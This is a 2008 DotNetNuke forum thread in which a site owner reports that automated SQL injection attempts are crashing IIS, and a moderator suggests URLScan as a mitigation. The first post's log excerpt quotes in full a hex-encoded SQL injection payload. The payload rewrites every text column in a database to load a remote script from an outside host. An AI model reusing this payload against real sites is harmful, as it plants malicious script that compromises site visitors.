Small width layout Medium width layout Maximum width layout Small text Medium text Large text
     Search
Downloads Downloads Directory Directory Forums Forums Forge Forge Blogs Blogs        Marketplace Marketplace Careers Program Careers
Community › Forums Register  |  

AspDotNetStoreFront
  Ads  
 


  Sponsors  

Meet Our Sponsors

Red-Gate Software
MaximumASP
SourceGear - Tools for Developers
.: CounterSoft :.
telerik
ExactTarget email software solutions
 


DotNetNuke Forums
 
  Forum  General DotNetN...  Chat About It!  SQL Injection Attack acting as DOS on DNN
Previous Previous
 
Next Next
New Post 8/20/2008 4:05 PM
User is offline StatisticsIO
22 posts
10th Ranked


SQL Injection Attack acting as DOS on DNN 

I have been getting 500 errors all day and have had to cycle the app pool to fix it. It looks like it is related to the chinese SQL injection attacks. The SQL injection doesn't work but it knocks IIS over. It looks like the problem happens when they pass the query string to search. Could my host have me throttled in IIS so the pool chokes when a seach like this is run? Is there anything I can do?

 

Here is a log exceprt:

2008-08-20 20:10:49 W3SVC293 GENERIC10 66.206.198.97 GET /Home/SearchResults/tabid/37/Default.aspx Search=Statement;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 67.163.214.146 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) .ASPXANONYMOUS=Y99305E5yQEkAAAAMmIwYzEyMmUtOTM2MC00NGU0LTllODQtZjczZWFjYzkzNjY50;+language=en-US - statisticsio.com 200 0 0 34325 1662 1562
 
 
New Post 8/20/2008 5:24 PM
User is offline cathal connolly
2757 posts
www.cathal.co.uk
5th Ranked










Re: SQL Injection Attack acting as DOS on DNN 

Sadly this has been happening to a number of users recently. It's not a dotnetnuke issue, it's automated robots trying (and in dotnetnuke's case failing) to attack sites via sql injection. You can read more about this at:

http://www.hanselman.com/blog/HackedAndIDidntLikeItURLScanIsStepZero.aspx

http://twitter.com/haacked (See august 8 entries)

I blogged some more detail about this @ http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryID/1930/Default.aspx , and link to some tools (urlscan) which should help mitigate against it.

Cathal
 
 Page 1 of 1
Previous Previous
 
Next Next
  Forum  General DotNetN...  Chat About It!  SQL Injection Attack acting as DOS on DNN
 


Forum Policy

These Discussion Forums are dedicated to the discussion of the DotNetNuke Web Application Framework.

For the benefit of the community and to protect the integrity of the project, please observe the following posting guidelines:

1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DotNetNuke.
2. Discussion or promotion of DotNetNuke product releases under a different brand name are strictly prohibited.
3. No Flaming or Trolling.
4. No Profanity, Racism, or Prejudice.
5. Site Moderators have the final word on approving/removing a thread or post or comment.
6. English language posting only, please.
 


DNN Photo Gallery
DNN Photo Gallery is a truly unique photo management module released January 1st 2006. With DNN Photo Gallery you can REALLY integrate images into your existing portal and make them look like they were designed for your site.
DNN Photo Gallery 		Swirlhost Inc.
Affordable DotNetNuke Hosting, Skin Development, Custom Module Development, and DotNetNuke Consulting. We will install your preference of DNN and now host with us and get a free license for the Swirl AJAX Chatroom Module.
www.swirlhost.com 		Active Modules, Inc.
Creators of Active Forums, the best forum module for DotNetNuke
www.activemodules.com

DotNetNuke Corporation   Terms Of Use  Privacy Statement
DotNetNuke®, DNN®, and the DotNetNuke logo are trademarks of DotNetNuke Corporation
Hosted by MaximumASP